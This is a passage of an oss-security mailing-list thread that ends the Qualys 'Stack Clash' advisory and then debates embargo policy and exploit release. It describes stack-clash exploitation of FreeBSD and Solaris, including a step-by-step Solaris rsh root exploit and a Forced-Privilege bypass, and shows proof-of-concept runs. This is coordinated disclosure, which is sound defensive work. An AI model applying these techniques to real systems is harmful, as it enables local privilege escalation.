2779 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat
...
2779 0x28400000 0x28800000 rw- 22 35 2 0 ---- df
2779 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df
2779 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph

% sh -c 'LD_PRELOAD=libthr.so exec procstat -v $$'
PID START END PRT RES PRES REF SHD FLAG TP PATH
2798 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat
...
2798 0x28400000 0x28800000 rw- 23 35 2 0 ---- df
2798 0xbbbfe000 0xbbbff000 --- 0 0 0 0 ---- --
2798 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df
2798 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph

Unfortunately, this secondary stack guard-page does not mitigate the
vulnerabilities that we discovered in FreeBSD's stack guard-page
implementation:

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 1

% sh -c 'LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPU'
char at 0xbfbde000: 41

% sh -c 'while true; do LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPE; done'
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbda5e000: 41; final dist 3839 (35262207)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbdb1e000: 41; final dist 3549 (34475485)
Segmentation fault
Segmentation fault
Segmentation fault
...

========================================================================
IV.4.4. Remote exploitation
========================================================================

Because FreeBSD's stack guard-page is disabled by default, we tried (and
failed) to remotely exploit a test service vulnerable to:

- an unlimited memory leak that allows us to malloc()ate gigabytes of
memory;

- a limited recursion that allows us to allocate up to 1MB of stack
memory.

FreeBSD's malloc() implementation (jemalloc) mmap()s 4MB chunks of
anonymous memory that are aligned on multiples of 4MB. The first 4MB
mmap() chunk starts at 0x28400000, and the last 4MB mmap() chunk ends at
0xbf800000, because the stack itself already ends at 0xbfc00000; but it
is impossible to cover this final mmap-stack distance (almost 4MB) with
the limited recursion (1MB) of our test service.

...
break(0x80499b0) = 0 (0x0)
break(0x8400000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 672845824 (0x281ad000)
mmap(0x285ad000,2437120,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 677040128 (0x285ad000)
munmap(0x281ad000,2437120) = 0 (0x0)
mmap(0x0,8388608,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 679477248 (0x28800000)
munmap(0x28c00000,4194304) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 683671552 (0x28c00000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 687865856 (0x29000000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 692060160 (0x29400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 696254464 (0x29800000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 700448768 (0x29c00000)
...
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1103101952 (0xbe400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1098907648 (0xbe800000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1094713344 (0xbec00000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1090519040 (0xbf000000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1086324736 (0xbf400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x8800000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x8c00000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x9000000) = 0 (0x0)
...
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x27c00000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x28000000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x28400000) ERR#12 'Cannot allocate memory'

========================================================================
IV.5. Solaris >= 11.1
========================================================================

========================================================================
IV.5.1. Minimal RLIMIT_STACK vulnerability (CVE-2017-3630)
========================================================================

On Solaris, ASLR can be enabled or disabled for each ELF binary with the
SUNW_ASLR dynamic section entry (man elfedit):

$ elfdump /usr/bin/rsh | egrep 'ASLR|NX'
[39] SUNW_ASLR 0x2 ENABLE
[40] SUNW_NXHEAP 0x2 ENABLE
[41] SUNW_NXSTACK 0x2 ENABLE

Without ASLR

If ASLR is disabled:

- a stack region of size RLIMIT_STACK is reserved in the address-space;

- a 4KB stack guard-page is mapped directly below this stack region;

- the runtime linker ld.so is mapped directly below this stack
guard-page.

$ cp /usr/bin/sleep .
$ chmod u+w ./sleep
$ elfedit -e 'dyn:sunw_aslr disable' ./sleep

$ sh -c 'ulimit -S -s; ./sleep 3 & pmap -r ${!}'
8192
7176: ./sleep 3
...
FE7B1000 228K r-x---- /lib/ld.so.1
FE7FA000 8K rwx---- /lib/ld.so.1
FE7FC000 8K rwx---- /lib/ld.so.1
FE7FF000 8192K rw----- [ stack ]
total 17148K

$ sh -c 'ulimit -S -s 64; ./sleep 3 & pmap -r ${!}'
7244: ./sleep 3
...
FEFA1000 228K r-x---- /lib/ld.so.1
FEFEA000 8K rwx---- /lib/ld.so.1
FEFEC000 8K rwx---- /lib/ld.so.1
FEFEF000 64K rw----- [ stack ]
total 9020K

On the one hand, a local attacker can exploit this simplified
stack-clash:

- Step 1 (Clash) is not needed, because ld.so is naturally mapped
directly below the stack (the distance between the end of ld.so's
read-write segment and the start of the stack is 4KB, the stack
guard-page);

- Step 2 (Run) is not needed, because a local attacker can set
RLIMIT_STACK to just a few kilobytes, reserve a very small stack
region, and hence shorten the distance between the stack-pointer and
the start of the stack (and the end of ld.so's read-write segment);

- Step 3 (Jump) can be completed with a large stack-based buffer that is
not fully written to;

- Step 4b (Smash) can be completed by overwriting the function pointers
in ld.so's read-write segment with the contents of a stack-based
buffer.

Such a simplified stack-clash exploit was first mentioned in Gael
Delalleau's 2005 presentation (slide 30).

On the other hand, a remote attacker cannot modify RLIMIT_STACK and must
complete Step 2 (Run) with a recursive function that consumes the 8MB
(the default RLIMIT_STACK) between the stack-pointer and the start of
the stack.

With ASLR

If ASLR is enabled:

- a stack region of size RLIMIT_STACK is reserved in the address-space;

- a 4KB stack guard-page is mapped directly below this stack region;

- the runtime linker ld.so is mapped below this stack guard-page, but at
a random distance (within a [4KB,128MB] range) -- effectively a large,
secondary stack guard-page.

On the one hand, a local attacker can run the simplified "Without ASLR"
stack-clash exploit until the ld.so-stack distance is minimal -- with a
probability of 4KB/128MB=1/32K, the distance between the end of ld.so's
read-write segment and the start of the stack is exactly 8KB: the stack
guard-page plus the minimum distance between the stack guard-page and
ld.so (CVE-2017-3629).

On the other hand, a remote attacker must complete Step 2 (Run) with a
recursive function, and:

- has a good chance of exploiting this stack-clash after 32K connections
(when the ld.so-stack distance is minimal) if the remote service
re-execve()s (re-randomizes the ld.so-stack distance for each new
connection);

- cannot exploit this stack-clash if the remote service does not
re-execve() (does not re-randomize the ld.so-stack distance for each
new connection) unless the attacker is able to restart the service,
reboot the server, or target a 32K-server farm.

========================================================================
IV.5.2. /usr/bin/rsh exploit
========================================================================

/usr/bin/rsh is SUID-root and its main() function allocates a 50KB
stack-based buffer that is not written to and can be used to jump over
the stack guard-page, into ld.so's read-write segment, in Step 3 of our
simplified stack-clash exploit.

Next, we discovered a general method for gaining eip control in Step 4b:
setlocale(LC_ALL, ""), called by the main() function of /usr/bin/rsh and
other SUID binaries, copies the LC_ALL environment variable to several
stack-based buffers and thus smashes ld.so's read-write segment and
overwrites some of ld.so's function pointers.

Last, we execute our own shell-code: we return-into-binary (/usr/bin/rsh
is not a PIE), to an instruction that reliably jumps into a copy of our
LC_ALL environment variable in ld.so's read-write segment, which is in
fact read-write-executable. For example, after we gain control of eip:

- on Solaris 11.1, we return to a "pop; pop; ret" instruction, because a
pointer to our shell-code is stored at an 8-byte offset from esp;

- on Solaris 11.3, we return to a "call *0xc(%ebp)" instruction, because
a pointer to our shell-code is stored at a 12-byte offset from ebp.

Our Solaris exploit brute-forces the random ld.so-stack distance and two
parameters:

- the RLIMIT_STACK;

- the length of the LC_ALL environment variable.

========================================================================
IV.5.3. Forced-Privilege vulnerability (CVE-2017-3631)
========================================================================

/usr/bin/rsh is SUID-root, but the shell that we obtained in Step 4b of
our stack-clash exploit did not grant us full root privileges, only
net_privaddr, the privilege to bind to a privileged port number.
Disappointed by this result, we investigated and found:

$ ggrep -r /usr/bin/rsh /etc 2>/dev/null
/etc/security/exec_attr.d/core-os:Forced Privilege:solaris:cmd:RO::/usr/bin/rsh:privs=net_privaddr

$ /usr/bin/rsh -h
/usr/bin/rsh: illegal option -- h
usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command
rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host

# cat truss.out
...
7319: execve("/usr/bin/rsh", 0xA9479C548, 0xA94792808) argc = 2
7319: *** FPRIV: P/E: net_privaddr ***
...

Unfortunately, this Forced-Privilege protection is based on the pathname
of SUID-root binaries, which can be execve()d through hard-links, under
different pathnames (CVE-2017-3631). For example, we discovered that
readable SUID-root binaries can be execve()d through hard-links in
/proc:

$ sleep 3 < /usr/bin/rsh & /proc/${!}/fd/0 -h
[1] 7333
/proc/7333/fd/0: illegal option -- h
usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command
rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host

# cat truss.out
...
7335: execve("/proc/7333/fd/0", 0xA947CA508, 0xA94792808) argc = 2
7335: *** SUID: ruid/euid/suid = 100 / 0 / 0 ***
...

This vulnerability allows us to bypass the Forced-Privilege protection
and obtain full root privileges with our /usr/bin/rsh exploit.


========================================================================
V. Acknowledgments
========================================================================

We thank the members of the distros list, Oracle/Solaris, Exim, Sudo,
***@kernel.org, grsecurity/PaX, and OpenBSD.
k***@redhat.com
2017-06-19 15:40:28 UTC
Permalink
On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
>
> Qualys Security Advisory
>
> The Stack Clash

I just want to publicly thank Qualys for working with the Open Source
community so we (Linux and *BSD) could all get this fixed properly.
There was a lot of work from everyone involved and it all went pretty
smoothly.

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Daniel Micay
2017-06-19 16:46:20 UTC
Permalink
On Mon, 2017-06-19 at 09:40 -0600, ***@redhat.com wrote:
> On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
> >
> > Qualys Security Advisory
> >
> > The Stack Clash
>
> I just want to publicly thank Qualys for working with the Open Source
> community so we (Linux and *BSD) could all get this fixed properly.
> There was a lot of work from everyone involved and it all went pretty
> smoothly.

Fixing it properly would really also include fixing these:

https://gcc.gnu.org/bugzilla/show_bug.cgi?id=68065
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66479

and actually implementing -fstack-check as not just a no-op in Clang.

Windows has working stack probes, even in Windows XP and perhaps even
earlier. LLVM has working stack probes there (not sure if GCC deals with
it properly) yet doesn't make them available elsewhere.

Rust is 'memory safe' but has this same stack exhaustion issue. It
didn't used to have the issue, since it kept around the LLVM segmented
stack code generation after it dropped segmented stacks to check for
stack overflow in function preludes. That got dropped for a 1-3%
performance win from using stack probes instead... which was a good
idea, but without implementing stack probes... making it a terrible
idea. It was deferred to some later date. That was in July 2015, and 2
years later it's not done.
Marcus Meissner
2017-06-19 16:48:36 UTC
Permalink
On Mon, Jun 19, 2017 at 12:46:20PM -0400, Daniel Micay wrote:
> On Mon, 2017-06-19 at 09:40 -0600, ***@redhat.com wrote:
> > On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
> > >
> > > Qualys Security Advisory
> > >
> > > The Stack Clash
> >
> > I just want to publicly thank Qualys for working with the Open Source
> > community so we (Linux and *BSD) could all get this fixed properly.
> > There was a lot of work from everyone involved and it all went pretty
> > smoothly.
>
> Fixing it properly would really also include fixing these:
>
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=68065
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66479
>
> and actually implementing -fstack-check as not just a no-op in Clang.
>
> Windows has working stack probes, even in Windows XP and perhaps even
> earlier. LLVM has working stack probes there (not sure if GCC deals with
> it properly) yet doesn't make them available elsewhere.
>
> Rust is 'memory safe' but has this same stack exhaustion issue. It
> didn't used to have the issue, since it kept around the LLVM segmented
> stack code generation after it dropped segmented stacks to check for
> stack overflow in function preludes. That got dropped for a 1-3%
> performance win from using stack probes instead... which was a good
> idea, but without implementing stack probes... making it a terrible
> idea. It was deferred to some later date. That was in July 2015, and 2
> years later it's not done.

The GCC team at least has been working on patches on this topic and they will also
continue to work on this publically soon.

Ciao, Marcus
Solar Designer
2017-06-19 20:39:33 UTC
Permalink
On Mon, Jun 19, 2017 at 09:40:28AM -0600, ***@redhat.com wrote:
> I just want to publicly thank Qualys for working with the Open Source
> community so we (Linux and *BSD) could all get this fixed properly.
> There was a lot of work from everyone involved and it all went pretty
> smoothly.

+1

It's excellent research by Qualys, building upon yet exceeding what was
previously known about this vulnerability class. The quality of Qualys'
writing is also rare these days.

That said, we owe apologies to the community for violating the published
distros list policy regarding the maximum embargo duration. Personally
and as distros list admin, I do apologize for letting this happen.

I think we shouldn't have let it happen.

The stated argument for extending the embargo duration beyond list
policy's maximum was that fixes presumably wouldn't be ready.

However, there were also arguments in favor of disclosing on the
originally planned date, which was within list policy: interim
workarounds and mitigations could be ready in time for that, the fixes
that would be ready by the later date (thus, presumably are ready now)
are not the end of the story anyway (specifically, gcc -fstack-check
wasn't expected to be ready, and isn't - let alone having distros'
userlands rebuilt with that option), the general issue wasn't new, and
all the usual arguments against long embargoes (some of the affected
parties being left out of the discussion, inconvenient and maybe less
productive discussion in the smaller private community, risk of leaks,
risk of rediscovery).

Apparently, the workarounds and mitigations just were not enterprisey
enough for the bigger players. Releasing interim updates first would
mean the vendors would have to acknowledge that some (I think obscure)
functionality might be temporarily(?) gone, until a later final update
that would include the more invasive fixes for the underlying issues
while optionally removing the previously introduced workarounds and
mitigations (although personally I would prefer to make them standard,
as security hardening). The vendors could also provide a knob (e.g., a
sysctl) to restore the questionable functionality right away (in this
case, it's things like limited debugging of dynamic linking on SUID/SGID
exec, and multi-megabyte command-line argument lists to SUID/SGID
programs) for those customers who prefer no risk of breakage over
security. I understand it's a tough trade-off to expose to a paying
customer. Yet I think it would have been most reasonable from a purely
technical and community friendliness points of view.

As Qualys advisory says, relevant security hardening for Linux kernel is
already found in grsecurity (per my quick check, some of it since 2012,
some earlier). Relevant security hardening for glibc has been in Owl's
and ALT Linux's packages (always enabled - no knob) since at least 2005
(some or all of it probably also since 2000-2001, but I didn't re-review
how complete older revisions of that patch were). Merging some of those
changes (at least the least invasive ones, sufficient to deal with the
most promising and most immediate attacks - short of the currently more
hypothetical remote attacks on system services) into distros' kernels
and glibc could surely be done in 14 days, including QA.

Apparently, companies disclosing security issues are concerned of being
held to a higher standard (than individuals) with regard to being (or
appearing) responsible. If a company's disclosure is deemed
irresponsible by some (like we've seen happen before), that company (and
others) might become more cautious next time (which might be what
happened here), or worse - they might no longer fund security research
(luckily not the case here).

When I say these things, I don't mean to blame anyone, nor any company.
Everyone was probably doing their best under their circumstances. I am
merely sharing my thoughts with the community.

Qualys first informed the distros list about this upcoming set of issues
on May 3. This initial notification didn't say Stack Clash nor anything
like that, but merely expressed intent to disclose the issues and
concern that the list's maximum embargo duration of 14 to 19 days might
not be sufficient in this case. In the resulting discussion, I agreed
to consider extending the embargo beyond list policy should there be
convincing reasons for that. In retrospect, I think I shouldn't have
agreed to that.

Qualys posted the detail to distros on May 17 with public disclosure
planned for May 30, which was within list policy. Due in part to
requests by Red Hat (who were going to do much of the work needed by
other distros, in particular on glibc) and presumably Qualys' internal
reasoning, on May 23 Qualys unilaterally said they were extending the
embargo until June 19 (the date previously requested by Red Hat, and
IIRC one that Qualys had said was also known good for Oracle Solaris,
although Oracle was OK with others publishing on May 30), and they said
they were already in the process of informing others (those they had
notified beyond the distros list membership) of this extension.

This was against what I had said previously, where I offered merely to
consider extending the embargo, not to unconditionally accept a decision
like this from Qualys nor anyone else. At this point, I was still in my
right to insist on the originally planned date, and to make it happen
technically - just post the detail to oss-security myself on May 30, as
that wouldn't have violated any agreement I had. (Of course, people
would be mad at me.) Instead:

On Tue, May 23, 2017 at 11:21:01AM +0200, Solar Designer wrote:
> That's really bad. I don't support you in your decision as from my
> perspective it's wrong, but I also don't want to go against it.
> So I reluctantly accept it

I didn't say it at the time, but frankly part of my reasoning for the
reluctant acceptance was that I had no idea what might have been going
on inside Qualys, nor wanted to have that inside info. I understand
it's rare for companies to do quality security research, and I didn't
want my action to have hampered the stream of quality security research
we're seeing from Qualys lately.

Distro vendors saying they wouldn't be ready wasn't as important to me.
In fact, most distros hadn't yet expressed a clear opinion by then and I
was still NAK'ing Red Hat's requests at the time of Qualys' decision.

I am really not blaming Red Hat here. They were the ones making the
request largely because they were also one of two distros, the other
being SUSE, doing much of the work on shared upstream code, for benefit
of most other Linux distros.

Anyhow, with the unfortunate embargo extension in place, my remaining
goal was to minimize the damage. I helped disentangle and push out two
of the sub-issues - with Sudo and ISC/Vixie Cron - on dates that are
within list policy (no more than 14 days since initial disclosure of
vulnerability detail on the distros list). I also used the opportunity
to test which of the distros are actually reading the lengthy thread
(resulting in one distro, which was represented by just one person,
getting removed from the distros list). Finally, it's also in this
context that I decided to accept some non-distro volunteers to help with
patch review (unfortunately, this hasn't worked well enough yet -
although some patch review did occur and changes were made, an important
issue with the first Sudo patch was missed).

Timeline:

May 3 - preliminary notification by Qualys, no detail
May 17 - detail posted by Qualys on Stack Clash and Sudo
May 23 - embargo extension
May 26 - detail posted by Qualys on Cron
May 30 - initially planned public disclosure date for all Qualys issues
May 30 - Sudo issue public:
http://www.openwall.com/lists/oss-security/2017/05/30/16
May 31 - Sudo incomplete fix fixed in 1.8.20p2
June 2 - Sudo incomplete fix and its fix announced:
http://www.openwall.com/lists/oss-security/2017/06/02/7
June 8 - Cron minor issue public (along with some fixes):
http://www.openwall.com/lists/oss-security/2017/06/08/3
June 19 - Stack Clash public

Since we were making this public in pieces like that, I have to say: no,
there's nothing else left to publish as part of this series of Qualys'
findings. Everything Qualys brought to distros so far is now public.

Given this experience, I am not going to give any impression I could
agree to an embargo extension beyond list policy again. I am going to
enforce the stated list policy. Unfortunately, this means that next
time someone or some company who's extra careful about being/appearing
responsible wants to inform distros of an issue, they might opt to work
with individual distros off-list or through some other channel. That's
life. At least the distros list would not be contributing to that.
Having this discussion explode on the distros list was not great in
other aspects anyway - it's too many too frequent messages for too long
to conveniently handle on an encrypted list. This wasn't worth it.

I am also going to remove the "up to 19 days" option, where an embargo
longer than 14 days (up to 19) could be applied for issues posted to
distros too close to or on a weekend, so that the embargo time could be
"rounded up" to expire next Tuesday after the normal maximum of 2 weeks.
Part of the reason for this removal, besides desire to shorten embargoes
in general and on average, is to remove the wrong incentive to report
issues to distros close to a weekend just to have (and give distros)
more time (much of that being an extra weekend). The original issue
this option tried to address can also be addressed by "rounding down"
(e.g., to last Wednesday or Thursday before 14 days would run out on a
weekend), so let's be doing that.

This wrong incentive didn't play a role this time, but it was mentioned.

Alexander

P.S. While I am at it, for those reading this in web archives of the
list here's a link to a portion of this thread on gcc issues, which I
think inadvertently broke off:

http://www.openwall.com/lists/oss-security/2017/06/19/6
Solar Designer
2017-06-20 13:22:04 UTC
Permalink
On Mon, Jun 19, 2017 at 10:39:33PM +0200, Solar Designer wrote:
> Since we were making this public in pieces like that, I have to say: no,
> there's nothing else left to publish as part of this series of Qualys'
> findings. Everything Qualys brought to distros so far is now public.

I have to correct the above statement as I totally forgot about the
exploits. While all issues Qualys brought to distros so far are now
public, Qualys' own exploits for them are not public yet. IIRC, Qualys
selectively sent the exploits to affected vendors, but that included
sending the Linux-specific exploits to the linux-distros sub-list.

Qualys, I suggest that, like you did with the Sudo exploit, you publish
your Stack Clash exploits in here as soon as third-party exploits of
comparable functionality appear, or next Tuesday, whichever is earlier.

Please confirm that you intend to do so in a reply to this message, so
that everyone in here knows what to expect.

Alexander
Qualys Security Advisory
2017-06-21 21:28:35 UTC
Permalink
Hi Solar, all,

On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
> Qualys, I suggest that, like you did with the Sudo exploit, you publish
> your Stack Clash exploits in here as soon as third-party exploits of
> comparable functionality appear, or next Tuesday, whichever is earlier.

We have discussed this internally, and we will first publish the Stack
Clash exploits and proofs-of-concepts that we sent to the distros@ and
linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
Solaris rsh exploit.

We will do so next Tuesday, but we will publish our Linux exploits and
proofs-of-concept if and only if Fedora updates are ready by then, our
NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
ready by then.

If someone happens to know of another major distribution that has not
published patches and updates yet, please let us all know by replying
here to oss-security. Thank you very much!

With best regards,

--
the Qualys Security Advisory team
n***@curso.re
2017-06-21 21:45:45 UTC
Permalink
Qualys Security Advisory <***@qualys.com>
writes:

> Hi Solar, all,
>
> On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
>> Qualys, I suggest that, like you did with the Sudo exploit, you publish
>> your Stack Clash exploits in here as soon as third-party exploits of
>> comparable functionality appear, or next Tuesday, whichever is earlier.
>
> We have discussed this internally, and we will first publish the Stack
> Clash exploits and proofs-of-concepts that we sent to the distros@ and
> linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
> Solaris rsh exploit.
>
> We will do so next Tuesday, but we will publish our Linux exploits and
> proofs-of-concept if and only if Fedora updates are ready by then, our
> NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
> and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
> ready by then.
>
> If someone happens to know of another major distribution that has not
> published patches and updates yet, please let us all know by replying
> here to oss-security. Thank you very much!
>
> With best regards,

(posting from gmane... I hope it's OK)

Hello,

not sure it counts as a major distribution (probably not), but NixOS
(https://nixos.org) is gaining traction and, as far as I understand,
they are working on patches but they don't seem to be ready yet.

Many thanks to everybody for your work,

-- S.
Franz Pletz
2017-06-21 23:03:16 UTC
Permalink
On Wed, 21 Jun 2017 22:45:45 +0100
***@curso.re wrote:

> not sure it counts as a major distribution (probably not), but NixOS
> (https://nixos.org) is gaining traction and, as far as I understand,
> they are working on patches but they don't seem to be ready yet.

Hi,

there is an open pull request[0] that will be merged soon.

Unfortunately we can't yet fulfill all of the requirements of the
distros mailing list. That's why we had no prior notice.

NixOS does have an active security team[1] though.

Cheers,
Franz

[0]: https://github.com/NixOS/nixpkgs/pull/26750
[1]: https://nixos.org/nixos/security.html
Solar Designer
2017-06-26 00:35:57 UTC
Permalink
On Wed, Jun 21, 2017 at 02:28:35PM -0700, Qualys Security Advisory wrote:
> On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
> > Qualys, I suggest that, like you did with the Sudo exploit, you publish
> > your Stack Clash exploits in here as soon as third-party exploits of
> > comparable functionality appear, or next Tuesday, whichever is earlier.
>
> We have discussed this internally, and we will first publish the Stack
> Clash exploits and proofs-of-concepts that we sent to the distros@ and
> linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
> Solaris rsh exploit.
>
> We will do so next Tuesday, but we will publish our Linux exploits and
> proofs-of-concept if and only if Fedora updates are ready by then, our
> NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
> and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
> ready by then.
>
> If someone happens to know of another major distribution that has not
> published patches and updates yet, please let us all know by replying
> here to oss-security. Thank you very much!

Thank you!

We didn't have a specific policy on exploit publication, but for further
occasions I've just added this clarification to:

http://oss-security.openwall.org/wiki/mailing-lists/distros

"If you shared exploit(s) that are not an essential part of the issue
description, then at your option you may slightly delay posting them to
oss-security but you must post the exploits to oss-security within at
most 7 days of making the mandatory posting above. If you exercise this
option, you have two mandatory postings to make: first with a
sufficiently detailed issue description (as requested above) and with an
announcement of your intent to post the exploits separately (please
mention exactly when), and second with the exploits - or indeed you
could have included the exploits right away, in your first and only
mandatory posting."

The decision to wait for fixes in major distros that almost certainly do
intend to release fixes makes sense to me. I haven't found a good way
to specify it as part of policy yet. For now, we may plan to be not as
strict at enforcing the above addition to the policy as I intend to be
at enforcing the main policy of max 14 days for issue detail (possibly
excluding exploits). Specifically, occasional well-reasoned exceptions
where exploits may be posted later than in 7 days may be made - or maybe
we simply need to relax the "at most 7 days" requirement, replacing it
with a higher maximum and a 7 days guideline. Regardless, since this
will be for already-public issues, we'll be able to discuss any such
exceptions or policy changes in public as well - here on oss-security.

Alexander
Qualys Security Advisory
2017-06-28 17:45:37 UTC
Permalink
Hi all,

On Mon, Jun 26, 2017 at 02:35:57AM +0200, Solar Designer wrote:
> The decision to wait for fixes in major distros that almost certainly do
> intend to release fixes makes sense to me.

Thank you. Since Fedora and Slackware published their updates, and
FreeBSD and NetBSD published their patches (and our *BSD POCs are not
full-fledged exploits anyway), we attached our Stack Clash exploits and
POCs to this mail (alternatively, they are also available at
https://www.qualys.com/research/security-advisories/).

A few notes on the Linux ld.so exploits:

- Linux_ldso_dynamic's probability of success varies significantly from
one SUID binary to another, because it depends on the size of the
.dynamic, .data, and .bss sections of the SUID binary.

- Linux_ldso_hwcap's probability of success depends on the length of the
path to the SUID binary -- as a rule of thumb, the longer the path,
the higher the probability of success.

- On Fedora and CentOS, Linux_ldso_hwcap_64 may not work against
"short-path" SUID binaries, but it works against the "long-path" SUIDs
that are installed by default (for example,
/usr/lib/polkit-1/polkit-agent-helper-1).

Moreover, we wrote a quick-and-dirty version of this exploit that does
work against the SUIDs in /usr/bin (it does not hardcode the 96KB/32KB
sizes of argv[] pointers/free stack space, but instead optimizes these
sizes). However, we wanted to keep the main loop of this exploit as
simple as possible, and this improvement is therefore left as an
exercise for the interested reader.

We are at your disposal for questions, comments, and further
discussions. Thank you very much!

With best regards,

--
the Qualys Security Advisory team

Give 'Em Enough ROP
--The Clash, second studio album
Josh Bressers
2017-06-21 12:35:34 UTC
Permalink
On Mon, Jun 19, 2017 at 3:39 PM, Solar Designer <***@openwall.com> wrote:
>
>
> That said, we owe apologies to the community for violating the published
> distros list policy regarding the maximum embargo duration. Personally
> and as distros list admin, I do apologize for letting this happen.
>
> I think we shouldn't have let it happen.
>
>
I suspect the extended embargo was exactly correct in this instance. Having
a policy you follow no matter what isn't ideal either (in fact it's
probably dangerous).

We've all been through a lot of embargoes, two weeks is more than
acceptable for most of them, it's a very good thing to have a forcing
function when needed. This one was special, nobody can deny that. It was
big, complex, and amazing. It ticked all the boxes. It affected a
substantial portion of the Internet. Had a name. Is a very old bug. Was
very serious. Had a great advisory and organization behind it.

Yet nobody flipped out. It was unexciting.

I suspect it was all so smooth because on Monday because everyone was
ready, everyone knew what was going on. There was no rushing, nothing was
on fire. There was time to develop patches properly. Everyone had their
story straight. It's quite likely if you force a release in two weeks
because that's the rule, someone not ready would create a story where one
shouldn't exist.

I applaud everyone involved. I'm sure there were issues, but I doubt such a
large effort could have gone better. Rules such as this exist to guide us,
don't let them constrain us.

--
JB
Solar Designer
2017-06-21 14:36:31 UTC
Permalink
On Wed, Jun 21, 2017 at 07:35:34AM -0500, Josh Bressers wrote:
> I suspect the extended embargo was exactly correct in this instance.

There are certainly good arguments in favor of the extended embargo, and
a lot of people will agree with you.

There are also good arguments in favor of not having extended the
embargo, and to me those are more convincing overall.

So it's not an instance of us having done something unambiguously wrong,
nor something unambiguously right. It's a matter of different
approaches and opinions. But there's also the list policy, and it is
such for good reasons.

> Having
> a policy you follow no matter what isn't ideal either (in fact it's
> probably dangerous).

This is why there have been occasional exceptions so far, and I tried to
note and explain each one of those publicly here on oss-security. This
is also why I agreed to "consider" making an exception in this case, but
I dislike what this resulted in. Naturally, my mandatory explanation
reflects that.

> We've all been through a lot of embargoes, two weeks is more than
> acceptable for most of them, it's a very good thing to have a forcing
> function when needed. This one was special, nobody can deny that. It was
> big, complex, and amazing. It ticked all the boxes. It affected a
> substantial portion of the Internet. Had a name. Is a very old bug. Was
> very serious. Had a great advisory and organization behind it.

